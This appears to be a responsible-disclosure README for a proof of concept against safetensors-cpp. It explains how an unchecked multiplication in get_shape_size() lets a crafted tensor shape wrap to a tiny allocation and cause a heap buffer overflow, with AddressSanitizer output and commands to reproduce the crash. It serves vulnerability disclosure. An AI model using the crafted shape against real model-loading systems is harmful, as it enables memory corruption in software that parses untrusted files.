---
tags:
- safetensors
- security-research
---

# SafeTensors C++ Integer Overflow PoC

**Security Research - Responsible Disclosure via huntr**

## Vulnerability

safetensors-cpp `get_shape_size()` multiplies shape dimensions without overflow checking.
The Rust reference implementation uses `checked_mul` and rejects overflow.

Shape `[4194305, 4194305, 211106198978564]` overflows uint64 to 4.
Parser allocates 16 bytes, consumer iterates 4194305+ elements -> heap overflow.

## ASan Result

```
AddressSanitizer: heap-buffer-overflow WRITE of size 4
0x6020000001a0 is located 0 bytes after 16-byte region
```

## Reproduction

```bash
python3 craft_overflow.py
g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
./crash overflow_tensor.safetensors
```